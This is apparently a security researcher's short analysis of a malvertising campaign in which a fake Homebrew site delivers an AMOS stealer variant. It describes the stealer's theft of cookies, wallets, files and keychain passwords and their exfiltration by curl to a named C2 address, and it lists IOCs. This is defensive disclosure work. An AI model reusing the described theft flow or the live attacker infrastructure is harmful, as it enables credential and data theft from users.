January 18, 2025, Ryan Chenkie, web developer and multi-business owner, warned users on Twitter about a malware campaign using google’s sponsored links to redirect developers to a Homebrew site malicious clone.
The malicious website, brewe[.]sh, would deceive its visitors by making them run a command — just like the real website — but with a modified script to first download and execute a malware, and then execute Homebrew’s installation script.
Malware Analysis
After being downloaded to /tmp/ the update program will run a dialog asking for root password, to then use it inside an osascript script. The script will steal files, navigation cookies and crypto wallet configurations and then send them to a C2 server.
Navigators included in the script are Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, Coccoc, Waterfox, Pale Moon and Firefox.
Wallets are Electrum, Coinomi, Exodus, Atomic, Wasabi, Ledger_Live, Monero, Bitcoin_Core, Litecoin_Core, Dash_Core, Electrum_LTC, Electron_Cash, Guarda, Dogecoin_Core and Trezor_Suite.
Finally, the script will also retrieve all files from the desktop, documents and downloads folders and all passwords stored in the macOS keychain.
It will then zip all files, and send them to http://81.19.135[.]54/joinsystem using a curl command.
This program is a variant of the AmosStealer, a well known macOS Information Stealer.
Another threat ?
It’s worth mentioning that before the Hombrew’s impersonation, the website was first used as another possible malware spread campaign, using the name Game On, as early as the second of January.
Afterwords
Please use adblockers, or at least check the url when clicking on a link. Always.
IOCs
448399ac7f194f784a912b8f5af416a6be4be9f479dc99ccc0376e1a56b97017
brewe[.]sh
norikosumiya[.]com
81.19.135[.]54
